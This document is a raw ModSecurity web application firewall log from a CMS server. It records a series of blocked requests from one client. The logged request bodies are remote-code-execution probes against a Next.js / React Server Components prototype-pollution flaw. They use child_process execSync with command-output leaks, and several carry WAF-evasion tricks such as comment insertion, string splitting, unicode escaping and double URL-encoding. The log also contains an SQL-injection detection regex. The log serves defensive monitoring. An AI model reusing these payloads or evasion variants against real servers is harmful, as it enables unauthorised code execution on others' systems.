"(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var/*bypass*/res=process.mainModule.require(/*waf*/'child_process'/*bypass*/).execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_f..."] [sever [hostname "cms.dev-unit.com"] [uri "/post"] [unique_id "adJm1TT5TgrBR8xRnfXBLgAAAVg"] [Sun Apr 05 15:42:45.332794 2026] [:error] [pid 1309:tid 1387] [client 172.94.9.253:46594] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require(['child','_','process'].join('')).execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x..."] [sever [hostname "cms.dev-unit.com"] [uri "/home"] [unique_id "adJm1T-XKUNJEHmNu6G7yQAAAJA"] [Sun Apr 05 15:42:45.333335 2026] [:error] [pid 13019:tid 13244] [client 172.94.9.253:46606] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('powershell -c \\x2241*271\\x22').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/user"] [unique_id "adJm1bxQSOrq_iRTM7dqrwAAAQQ"] [Sun Apr 05 15:42:45.333619 2026] [:error] [pid 23077:tid 23093] [client 172.94.9.253:46574] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('chi' 'ld_' 'pro' 'cess').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22..."] [sever [hostname "cms.dev-unit.com"] [uri "/home"] [unique_id "adJm1Zc83uMXRUE9zvQTcAAAAco"] [Sun Apr 05 15:42:45.371588 2026] [:error] [pid 13019:tid 13258] [client 172.94.9.253:46630] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var r=process.mainModule.require('child_process').spawnSync('sh',['-c','echo $((41*271))']);var res=r.stdout.toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22..."] [sever [hostname "cms.dev-unit.com"] [uri "/post"] [unique_id "adJm1bxQSOrq_iRTM7dqsAAAARI"] [Sun Apr 05 15:42:45.372681 2026] [:error] [pid 1503:tid 1510] [client 172.94.9.253:46624] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/profile"] [unique_id "adJm1UI7AjfUQYCN-J7D5QAAAME"] [Sun Apr 05 15:42:45.379615 2026] [:error] [pid 1503:tid 1519] [client 172.94.9.253:46652] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22:\\x22$1:__proto__:then\\x22,\\x22\\x5cu0073\\x5cu0074\\x5cu0061\\x5cu0074\\x5cu0075\\x5cu0073\\x22:\\x22resolved_model\\x22,\\x22\\x5cu0072\\x5cu0065\\x5cu0061\\x5cu0073\\x5cu006f\\x5cu006e\\x22:-1,\\x22\\x5cu0076\\x5cu0061\\x5cu006c\\x5cu0075\\x5cu0065\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim(..."] [sever [hostname "cms.dev-unit.com"] [uri "/home"] [unique_id "adJm1UI7AjfUQYCN-J7D5gAAAMo"] [Sun Apr 05 15:42:45.412574 2026] [:error] [pid 13019:tid 13246] [client 172.94.9.253:46558] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/shop"] [unique_id "adJm1bxQSOrq_iRTM7dqrgAAAQY"] [Sun Apr 05 15:42:45.420828 2026] [:error] [pid 13019:tid 13256] [client 172.94.9.253:46638] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth/signout"] [unique_id "adJm1bxQSOrq_iRTM7dqsQAAARA"] [Sun Apr 05 15:42:45.448458 2026] [:error] [pid 1309:tid 1390] [client 172.94.9.253:46742] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('powershell -c \\x2241*271\\x22').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/fr"] [unique_id "adJm1T-XKUNJEHmNu6G7ywAAAJM"] [Sun Apr 05 15:42:45.448479 2026] [:error] [pid 1309:tid 1393] [client 172.94.9.253:46698] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var\\x5ctres=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw\\x5ctObject.assign(new\\x5ctError('NEXT_REDIRECT'),{digest:\\x5ct`NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/profile"] [unique_id "adJm1T-XKUNJEHmNu6G7ygAAAJY"] [Sun Apr 05 15:42:45.448537 2026] [:error] [pid 13019:tid 13244] [client 172.94.9.253:46682] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22$K4\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:const..."] [sever [hostname "cms.dev-unit.com"] [uri "/post"] [unique_id "adJm1bxQSOrq_iRTM7dqsgAAAQQ"] [Sun Apr 05 15:42:45.448568 2026] [:error] [pid 23077:tid 23088] [client 172.94.9.253:46714] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/profile"] [unique_id "adJm1Zc83uMXRUE9zvQTcwAAAcU"] [Sun Apr 05 15:42:45.449381 2026] [:error] [pid 13019:tid 13251] [client 172.94.9.253:46740] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var/*bypass*/res=process.mainModule.require(/*waf*/'child_process'/*bypass*/).execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_f..."] [sever [hostname "cms.dev-unit.com"] [uri "/profile"] [unique_id "adJm1bxQSOrq_iRTM7dqswAAAQs"] [Sun Apr 05 15:42:45.450694 2026] [:error] [pid 1503:tid 1516] [client 172.94.9.253:46666] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/de"] [unique_id "adJm1UI7AjfUQYCN-J7D5wAAAMc"] [Sun Apr 05 15:42:45.452971 2026] [:error] [pid 13019:tid 13242] [client 172.94.9.253:46722] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22:\\x22$1:\\x5cu005f\\x5cu005f\\x5cu0070\\x5cu0072\\x5cu006f\\x5cu0074\\x5cu006f\\x5cu005f\\x5cu005f:\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22,\\x22\\x5cu0073\\x5cu0074\\x5cu0061\\x5cu0074\\x5cu0075\\x5cu0073\\x22:\\x22\\x5cu0072\\x5cu0065\\x5cu0073\\x5cu006f\\x5cu006c\\x5cu0076\\x5cu0065\\x5cu0064\\x5cu005f\\x5cu006d\\x5cu006f\\x5cu0064\\x5cu0065\\x5cu006c\\x22,\\x22\\x5cu0072\\x5cu0065\\x5cu0061\\x5cu0073\\x5cu006f\\x5cu006e\\x22:-1,\\x22\\x5cu0076\\x5cu0061\\x5cu0..."] [sever [hostname "cms.dev-unit.com"] [uri "/home"] [unique_id "adJm1bxQSOrq_iRTM7dqtAAAAQI"] [Sun Apr 05 15:42:45.454228 2026] [:error] [pid 13019:tid 13264] [client 172.94.9.253:46726] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('powershell -c \\x2241*271\\x22').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/post"] [unique_id "adJm1bxQSOrq_iRTM7dqtQAAARg"] [Sun Apr 05 15:42:45.506861 2026] [:error] [pid 13019:tid 13254] [client 172.94.9.253:46766] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(decodeURIComponent(decodeURIComponent('echo%20%24%28%2841%2A271%29%29'))).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_c..."] [sever [hostname "cms.dev-unit.com"] [uri "/home"] [unique_id "adJm1bxQSOrq_iRTM7dqtgAAAQ4"] [Sun Apr 05 15:42:45.509524 2026] [:error] [pid 23077:tid 23091] [client 172.94.9.253:46806] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS:0 outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "cms.dev-unit.com"] [uri "/profile"] [unique_id "adJm1Zc83uMXRUE9zvQTdQAAAcg"] [Sun Apr 05 15:42:45.509571 2026] [:error] [pid 1503:tid 1514] [client 172.94.9.253:46822] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS:0 outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "cms.dev-unit.com"] [uri "/home"] [unique_id "adJm1UI7AjfUQYCN-J7D6AAAAMU"] [Sun Apr 05 15:42:45.510065 2026] [:error] [pid 23077:tid 23089] [client 172.94.9.253:46768] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match 